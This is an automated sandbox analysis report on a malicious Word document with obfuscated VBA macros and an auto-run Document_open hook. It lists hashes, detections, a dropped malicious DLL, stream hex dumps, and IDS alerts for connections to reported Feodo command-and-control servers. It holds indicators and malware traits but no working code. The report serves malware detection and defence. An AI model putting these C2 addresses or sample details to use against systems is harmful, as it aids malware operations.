                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):631808
                                                    Entropy (8bit):6.9127096471964675
                                                    Encrypted:false
                                                    SSDEEP:12288:OYzchQVZnkmt/70MWugxPJZFpf0c1pH/bdJ8CA88fzsBsI3+Dc:B4KV5Hpt8bZHLp+CSfasO+
                                                    MD5:E09F65C1A92653035B27E603980CB205
                                                    SHA1:78DCA7A2190C82DC8DC4A0EAC302379804C79AA9
                                                    SHA-256:D09BACE1490F6EE322262FF2DA373E861F3B3B9BC03C386CE8A031648F1EAA4F
                                                    SHA-512:5D55BC984F6A044877912CBE0BA40DE0210CF25C7E4FB32CBE6DB9D5C60306280CD5EC84DF1674024CA89AD67FA49F7AA55CF5BCEAE458D90CE6D86CF209D8D3
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 82%
                                                    Joe Sandbox View:
                                                    • Filename: ARCH_25_012021.doc, Detection: malicious, Browse
                                                    • Filename: Arch_2021_717-1562532.doc, Detection: malicious, Browse
                                                    Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................0...p.......>.......@....@..........................................................................p..."...............................n..................................................................................CODE.............0.................. ..`DATA.........@.......4..............@...BSS..........`.......J...................idata..."...p...$...J..............@....reloc...n.......p...n..............@..P.rsrc...............................@..P....................................@..P........................................................................................................................................................................................................................

                                                    Static File Info

                                                    General

                                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Tenetur alias aut sint sequi facilis., Author: Sebastian Melgar, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Jan 25 09:28:00 2021, Last Saved Time/Date: Mon Jan 25 09:28:00 2021, Number of Pages: 1, Number of Words: 5622, Number of Characters: 32047, Security: 8
                                                    Entropy (8bit):6.658685583484107
                                                    TrID:
                                                    • Microsoft Word document (32009/1) 79.99%
                                                    • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                                                    File name:ARCH_25_012021.doc
                                                    File size:175104
                                                    MD5:baedc37e68b58765fa52c73d0fd2c2d5
                                                    SHA1:2131d1319b5de532638d34f1e3bf68337b6099bf
                                                    SHA256:94485b3ce47d4a2df6dba8e888ca7a360763f7edd5a0448552d1d06b6e4f4baa
                                                    SHA512:d0043f410e6b5aeb4aa07d331dcfb00977ee90471b5196a5d1431ddb3a5221f42546d9ed895c5b98ca649662468632289ccea2ec1ec5fda4269bb100414ad287
                                                    SSDEEP:1536:OJlTNVRcrrMUXyaJBsc3txOOgvWJVTjxo4Iri1R1ffFkBnyAZ:+TdcrrXyQBsc0vWJVi4IrwVSBH
                                                    File Content Preview:........................>................................... ..................................................................................................................................................................................................

                                                    File Icon

                                                    Icon Hash:e4eea2aaa4b4b4a4

                                                    Static OLE Info

                                                    General

                                                    Document Type:OLE
                                                    Number of OLE Files:1

                                                    OLE File "ARCH_25_012021.doc"

                                                    Indicators

                                                    Has Summary Info:True
                                                    Application Name:Microsoft Office Word
                                                    Encrypted Document:False
                                                    Contains Word Document Stream:True
                                                    Contains Workbook/Book Stream:False
                                                    Contains PowerPoint Document Stream:False
                                                    Contains Visio Document Stream:False
                                                    Contains ObjectPool Stream:
                                                    Flash Objects Count:
                                                    Contains VBA Macros:True

                                                    Summary

                                                    Code Page:1252
                                                    Title:Tenetur alias aut sint sequi facilis.
                                                    Subject:
                                                    Author:Sebastian Melgar
                                                    Keywords:
                                                    Comments:
                                                    Template:
                                                    Last Saved By:
                                                    Revion Number:1
                                                    Total Edit Time:0
                                                    Create Time:2021-01-25 09:28:00
                                                    Last Saved Time:2021-01-25 09:28:00
                                                    Number of Pages:1
                                                    Number of Words:5622
                                                    Number of Characters:32047
                                                    Creating Application:Microsoft Office Word
                                                    Security:8

                                                    Document Summary

                                                    Document Code Page:-535
                                                    Number of Lines:267
                                                    Number of Paragraphs:75
                                                    Thumbnail Scaling Desired:False
                                                    Company:Orta S.L.
                                                    Contains Dirty Links:False
                                                    Shared Document:False
                                                    Changed Hyperlinks:False
                                                    Application Version:917504

                                                    Streams with VBA

                                                    VBA File Name: A5ate73kc6cw5njy, Stream Size: 1173
                                                    General
                                                    Stream Path:Macros/VBA/A5ate73kc6cw5njy
                                                    VBA File Name:A5ate73kc6cw5njy
                                                    Stream Size:1173
                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . n < . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                    Data Raw:01 16 01 00 00 f0 00 00 00 04 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 0b 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 de 6e 3c 87 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                    VBA Code Keywords

                                                    Keyword
                                                    False
                                                    Private
                                                    VB_Exposed
                                                    Attribute
                                                    VB_Name
                                                    VB_Creatable
                                                    Document_open()
                                                    VB_PredeclaredId
                                                    VB_GlobalNameSpace
                                                    VB_Base
                                                    VB_Customizable
                                                    VB_TemplateDerived
                                                    VBA Code
                                                    VBA File Name: Gusca95luq_, Stream Size: 14646
                                                    General
                                                    Stream Path:Macros/VBA/Gusca95luq_
                                                    VBA File Name:Gusca95luq_
                                                    Stream Size:14646
                                                    Data ASCII:. . . . . . . . . d . . . . . . . . . . . . . . . l . . . . , . . . . . . . . . . . n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                    Data Raw:01 16 01 00 00 f0 00 00 00 64 10 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 6c 10 00 00 1c 2c 00 00 00 00 00 00 01 00 00 00 de 6e b6 8e 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                    VBA Code Keywords

                                                    Keyword
                                                    uldHRAc
                                                    BJMbZuJRF
                                                    xBaZq)
                                                    Const
                                                    BvPhx
                                                    PTpduh
                                                    prhgQCFm
                                                    Error
                                                    Split(urqwC,
                                                    IKEyYJ
                                                    cHCfACCC()
                                                    fsCkG
                                                    ndrons
                                                    Split(HYqcb,
                                                    Split(fsCkG,
                                                    lHXavB
                                                    DunxEHX
                                                    Split(sHhQm,
                                                    WPKmFe
                                                    ixJTYF
                                                    dFuMF
                                                    RcxFVMDOH()
                                                    vEmIAMH
                                                    BvPhx)
                                                    RcxFVMDOH
                                                    clPKFBjz
                                                    SzdUE
                                                    HIXwxDo
                                                    urqwC
                                                    BJMbZuJRF)
                                                    LnRqcjdHC
                                                    lhhIDAA)
                                                    mnSyJHAv()
                                                    JaknVR)
                                                    Split(WPKmFe,
                                                    JtcSFJR()
                                                    xBaZq
                                                    AQJEzpnoG
                                                    mxkikw
                                                    Array((qtNpWFzCE),
                                                    SVfwH)
                                                    DObDSSSH
                                                    "ndpns
                                                    kWUSef
                                                    mnSyJHAv
                                                    IkIlHED)
                                                    yNpnD
                                                    riWqFGJY
                                                    pqwm,
                                                    lrUBAA
                                                    TjMQdBBgE
                                                    ZJSnRBDm)
                                                    espWEuWIh
                                                    JjJbB
                                                    sHhQm
                                                    OOobG
                                                    OOobG()
                                                    CNUcG
                                                    Split(nvNjhAFA,
                                                    Array((eBzEFGPxh),
                                                    uZukAmEA
                                                    qtNpWFzCE
                                                    Array((KAAmsFJLa),
                                                    Range:
                                                    eGHABDHYI
                                                    Array((LpCFBdE),
                                                    "*high*,*critic*"
                                                    WzIrJQJ
                                                    tWLOCW
                                                    Array((yNpnD),
                                                    xjjUNmJ
                                                    WiAHIOige
                                                    vEmIAMH:
                                                    VHxfT
                                                    kXidGGmrk()
                                                    DGpFCB
                                                    mjbBYHhbs
                                                    wJdJAI)
                                                    Array((dvuZzGDnA),
                                                    Split(DSEaFYQ,
                                                    DGpFCB()
                                                    Split(rSrZBJJv,
                                                    otHyDQA
                                                    ZJSnRBDm
                                                    String
                                                    sujuoHFCJ
                                                    YtjFBe:
                                                    aACrBzCHd
                                                    PEoELvIQJ()
                                                    Array((cyDODgZgJ),
                                                    kRgnIQJCn
                                                    SVfwH
                                                    rSrZBJJv
                                                    zYRcUHEHG
                                                    prhgQCFm:
                                                    Split(XlUFJHR,
                                                    Nothing
                                                    Split(sujuoHFCJ,
                                                    VcboAE
                                                    XpIXCDhMq
                                                    ArMYJEkJb:
                                                    fEDGCAg
                                                    PASRFGECE
                                                    PASRFGECE()
                                                    ctRAim
                                                    jyxYAFLC
                                                    QFAdJG:
                                                    Array((muQUuJD),
                                                    eBzEFGPxh
                                                    Split(ctRAim,
                                                    vDIdCwGfT
                                                    Split(XpIXCDhMq,
                                                    PCtZE)
                                                    yPcgGA
                                                    NYPQCHF
                                                    ZDKqIFEBG()
                                                    nd:wns
                                                    OwqxzJE)
                                                    kXidGGmrk
                                                    xfQswJFE
                                                    Resume
                                                    tCOXBDEPL
                                                    VHxfT:
                                                    OwqxzJE
                                                    ortGB
                                                    NFoIZAgdj
                                                    DunxEHX()
                                                    wJdJAI
                                                    ifTgDoG)
                                                    hxzoFBtLC
                                                    HYqcb
                                                    Split(fEDGCAg,
                                                    PwyZCI
                                                    ndgmns
                                                    NGzByr
                                                    ffeODEi:
                                                    PTpduh:
                                                    jzCVAIVG
                                                    cpeHA
                                                    UTlaBhGD:
                                                    nEsTCdYDH
                                                    Array((huVBjtENv),
                                                    ndinns
                                                    elqXMZ:
                                                    xnvME()
                                                    HKXrDBEI
                                                    JaknVR
                                                    Array((jyxYAFLC),
                                                    Mid(skuwd,
                                                    Target)
                                                    bpMND
                                                    LXXQDDfJ
                                                    PCtZE
                                                    Split(TjMQdBBgE,
                                                    AQJEzpnoG:
                                                    gvcgAIUM
                                                    sOfSqNO
                                                    tCOXBDEPL()
                                                    MhDEGJ()
                                                    NGzByr:
                                                    ortGB:
                                                    pNdoqWCxt)
                                                    SbmMCGuEY
                                                    zYRcUHEHG:
                                                    IOPMfG()
                                                    nvNjhAFA
                                                    elqXMZ
                                                    Array((DObDSSSH),
                                                    Split(NvjyW,
                                                    JvTSZI
                                                    IkIlHED
                                                    ffeODEi
                                                    XlUFJHR
                                                    DSEaFYQ
                                                    AQOwDFGF
                                                    UTlaBhGD
                                                    UsjaB
                                                    ndmns
                                                    WiAHIOige:
                                                    Attribute
                                                    IUHjJ
                                                    uZukAmEA()
                                                    NYPQCHF)
                                                    Split(riWqFGJY,
                                                    PmuwJBJH
                                                    LpCFBdE
                                                    IOPMfG
                                                    ndsns
                                                    aACrBzCHd()
                                                    Array((eGHABDHYI),
                                                    huVBjtENv
                                                    Array((SbmMCGuEY),
                                                    Array((xfQswJFE),
                                                    ZDKqIFEBG
                                                    DKUOJzi
                                                    kWUSef:
                                                    cyDODgZgJ
                                                    KAAmsFJLa
                                                    VB_Name
                                                    CNUcG()
                                                    wdpnM
                                                    Content
                                                    Array((dFuMF),
                                                    Split(VcboAE,
                                                    tWLOCW()
                                                    dvuZzGDnA
                                                    Split(cpeHA,
                                                    Function
                                                    xnvME
                                                    JtcSFJR
                                                    ixJTYF)
                                                    Array((IKEyYJ),
                                                    VZWOFv()
                                                    AQOwDFGF:
                                                    oAcbS
                                                    tuLCMCI
                                                    JvTSZI:
                                                    cjdFFEGu
                                                    hxzoFBtLC)
                                                    rykKLTfBV
                                                    HsRXzxA
                                                    ndtns
                                                    FGWgu
                                                    VZWOFv
                                                    YtjFBe
                                                    nd_ns
                                                    dBZlAG)
                                                    Array((WzIrJQJ),
                                                    Array((zHRlEdEP),
                                                    cHCfACCC
                                                    Len(skuwd))
                                                    ifTgDoG
                                                    QFAdJG
                                                    Array((SzdUE),
                                                    PEoELvIQJ
                                                    Array((bpMND),
                                                    NFoIZAgdj)
                                                    Split(sOfSqNO,
                                                    pNdoqWCxt
                                                    Split(PmuwJBJH,
                                                    ArMYJEkJb
                                                    UsjaB)
                                                    lhhIDAA
                                                    MhDEGJ
                                                    zHRlEdEP
                                                    muQUuJD
                                                    Mid(Application.Name,
                                                    Array((jzCVAIVG),
                                                    Split(JjJbB,
                                                    LnRqcjdHC:
                                                    NvjyW
                                                    String:
                                                    uldHRAc)
                                                    PdrYYCtJ
                                                    IUHjJ:
                                                    otHyDQA()
                                                    yPcgGA)
                                                    HsRXzxA:
                                                    skuwd
                                                    dBZlAG
                                                    VBA Code
                                                    VBA File Name: Zcf1kk3t2ssv4r07m, Stream Size: 704
                                                    General
                                                    Stream Path:Macros/VBA/Zcf1kk3t2ssv4r07m
                                                    VBA File Name:Zcf1kk3t2ssv4r07m
                                                    Stream Size:704
                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                    Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 de 6e eb 0c 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                    VBA Code Keywords

                                                    Keyword
                                                    Attribute
                                                    VB_Name
                                                    VBA Code

                                                    Streams

                                                    Stream Path: \x1CompObj, File Type: data, Stream Size: 146
                                                    General
                                                    Stream Path:\x1CompObj
                                                    File Type:data
                                                    Stream Size:146
                                                    Entropy:4.00187355764
                                                    Base64 Encoded:False
                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
                                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 40 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 57 00 6f 00 72 00 64 00 20 00 39 00 37 00 2d 00
                                                    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 304
                                                    General
                                                    Stream Path:\x5DocumentSummaryInformation
                                                    File Type:data
                                                    Stream Size:304
                                                    Entropy:2.82977037235
                                                    Base64 Encoded:False
                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . . . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . K . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 00 01 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 ec 00 00 00 05 00 00 00 70 00 00 00 06 00 00 00 78 00 00 00 11 00 00 00 80 00 00 00 17 00 00 00 88 00 00 00 0b 00 00 00 90 00 00 00 10 00 00 00 98 00 00 00 13 00 00 00 a0 00 00 00
                                                    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 448
                                                    General
                                                    Stream Path:\x5SummaryInformation
                                                    File Type:data
                                                    Stream Size:448
                                                    Entropy:3.46647630871
                                                    Base64 Encoded:False
                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . , . . . . . . . 4 . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 90 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 60 01 00 00 03 00 00 00 98 00 00 00 04 00 00 00 44 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 c8 00 00 00 09 00 00 00 d4 00 00 00
                                                    Stream Path: 1Table, File Type: data, Stream Size: 6885
                                                    General
                                                    Stream Path:1Table
                                                    File Type:data
                                                    Stream Size:6885
                                                    Entropy:6.02650234948
                                                    Base64 Encoded:True
                                                    Data ASCII:j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                                    Data Raw:6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                                    Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 520
                                                    General
                                                    Stream Path:Macros/PROJECT
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Stream Size:520
                                                    Entropy:5.52447471798
                                                    Base64 Encoded:True
                                                    Data ASCII:I D = " { B 3 1 5 C D 8 3 - A E F A - 4 B 0 A - 9 9 4 6 - 6 3 1 D 4 8 9 C 2 2 F 0 } " . . D o c u m e n t = A 5 a t e 7 3 k c 6 c w 5 n j y / & H 0 0 0 0 0 0 0 0 . . M o d u l e = Z c f 1 k k 3 t 2 s s v 4 r 0 7 m . . M o d u l e = G u s c a 9 5 l u q _ . . E x e N a m e 3 2 = " J v k 5 9 3 o d o w j q u y o o " . . N a m e = " m x " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " A F A D 4 6 4 D F A F 3 D 1 F 7 D 1 F 7 D 1 F 7 D 1 F 7 "
                                                    Data Raw:49 44 3d 22 7b 42 33 31 35 43 44 38 33 2d 41 45 46 41 2d 34 42 30 41 2d 39 39 34 36 2d 36 33 31 44 34 38 39 43 32 32 46 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 41 35 61 74 65 37 33 6b 63 36 63 77 35 6e 6a 79 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 5a 63 66 31 6b 6b 33 74 32 73 73 76 34 72 30 37 6d 0d 0a 4d 6f 64 75 6c 65 3d 47 75 73 63 61 39 35 6c 75 71 5f 0d
                                                    Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 143
                                                    General
                                                    Stream Path:Macros/PROJECTwm
                                                    File Type:data
                                                    Stream Size:143
                                                    Entropy:3.86963281051
                                                    Base64 Encoded:False
                                                    Data ASCII:A 5 a t e 7 3 k c 6 c w 5 n j y . A . 5 . a . t . e . 7 . 3 . k . c . 6 . c . w . 5 . n . j . y . . . Z c f 1 k k 3 t 2 s s v 4 r 0 7 m . Z . c . f . 1 . k . k . 3 . t . 2 . s . s . v . 4 . r . 0 . 7 . m . . . G u s c a 9 5 l u q _ . G . u . s . c . a . 9 . 5 . l . u . q . _ . . . . .
                                                    Data Raw:41 35 61 74 65 37 33 6b 63 36 63 77 35 6e 6a 79 00 41 00 35 00 61 00 74 00 65 00 37 00 33 00 6b 00 63 00 36 00 63 00 77 00 35 00 6e 00 6a 00 79 00 00 00 5a 63 66 31 6b 6b 33 74 32 73 73 76 34 72 30 37 6d 00 5a 00 63 00 66 00 31 00 6b 00 6b 00 33 00 74 00 32 00 73 00 73 00 76 00 34 00 72 00 30 00 37 00 6d 00 00 00 47 75 73 63 61 39 35 6c 75 71 5f 00 47 00 75 00 73 00 63 00 61 00 39
                                                    Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4837
                                                    General
                                                    Stream Path:Macros/VBA/_VBA_PROJECT
                                                    File Type:data
                                                    Stream Size:4837
                                                    Entropy:5.51877025189
                                                    Base64 Encoded:True
                                                    Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                                                    Data Raw:cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
                                                    Stream Path: Macros/VBA/dir, File Type: WE32000 COFF executable not stripped N/A on 3b2/300 w/paging - version 18435, Stream Size: 628
                                                    General
                                                    Stream Path:Macros/VBA/dir
                                                    File Type:WE32000 COFF executable not stripped N/A on 3b2/300 w/paging - version 18435
                                                    Stream Size:628
                                                    Entropy:6.34127378287
                                                    Base64 Encoded:True
                                                    Data ASCII:. p . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . m 2 . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . Y m . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . O f f i c . . E O . f . . i . c 5 . E . . . . . . . E 2 D . F 8 D 0 4 C - 5 . B F A - 1 0 1 B -
                                                    Data Raw:01 70 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 6d 32 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 59 6d fe 61 1a 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d
                                                    Stream Path: WordDocument, File Type: data, Stream Size: 129150
                                                    General
                                                    Stream Path:WordDocument
                                                    File Type:data
                                                    Stream Size:129150
                                                    Entropy:7.03372694627
                                                    Base64 Encoded:True
                                                    Data ASCII:. . . . _ . . . . . . . . . . . . . . . . . . . . . . . % . . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . ~ . . . b . . . b . . . % . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                    Data Raw:ec a5 c1 00 5f c0 09 04 00 00 f1 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 25 9b 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 7e f8 01 00 62 7f 00 00 62 7f 00 00 25 93 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00
                                                    Stream Path: office, File Type: data, Stream Size: 796
                                                    General
                                                    Stream Path:office
                                                    File Type:data
                                                    Stream Size:796
                                                    Entropy:7.73402004362
                                                    Base64 Encoded:False
                                                    Data ASCII:. ~ . . . . . . 0 . . . . . a . Q . . . . u N . . . . . @ . l . Y . . . . . . . l . . . . . . . , y 0 p . . . . / . . . . . . { . . . . f . . . h . e _ . . . . . Q . . . . + . \\ . [ 3 . . . . . z . . > . H U . t . . P J . { . . ^ . M . . . ^ . . p { r . \\ . . . . . . . . . < . . . . S . . . ! . . 9 ? . . 1 6 9 . . . ` . . G w . . . . . u . . . . . K . . . . P . . . . . . . . . . 1 b . . G . . L . / ) . 9 . - . . n . . . M > . . . . . . . . . . . . . x e | . . N . l & . t . k . . + . . E . # . . I . . . O .
                                                    Data Raw:05 7e 92 a5 9d 13 9e 08 30 1e 99 01 10 eb 61 9c 51 88 d9 d2 03 75 4e cf e3 8a 00 be 40 b5 6c 0e 59 06 85 8a f6 95 1f 0e 6c a3 f6 9a 1f e6 d5 ae 2c 79 30 70 e3 b5 a9 8f 2f c2 c1 13 13 df c7 7b b2 8a a8 09 66 d6 a6 bb 68 cb 65 5f 7f b3 af fd b4 51 92 c7 84 fb 2b a3 5c f5 5b 33 d4 0c fa 8c db 7a e8 95 3e cb 48 55 d2 74 07 17 50 4a 10 7b 12 c4 5e c1 4d 00 f7 b6 5e 05 ac 70 7b 72 e7 5c

                                                    Network Behavior

                                                    Snort IDS Alerts

                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                    01/27/21-09:30:55.632048TCP2404344ET CNC Feodo Tracker Reported CnC Server TCP group 234916880192.168.2.2284.232.229.24
                                                    01/27/21-09:31:03.941037TCP2404334ET CNC Feodo Tracker Reported CnC Server TCP group 18491698080192.168.2.2251.255.203.164
                                                    01/27/21-09:31:50.136378TCP2404328ET CNC Feodo Tracker Reported CnC Server TCP group 15491718080192.168.2.22217.160.169.110
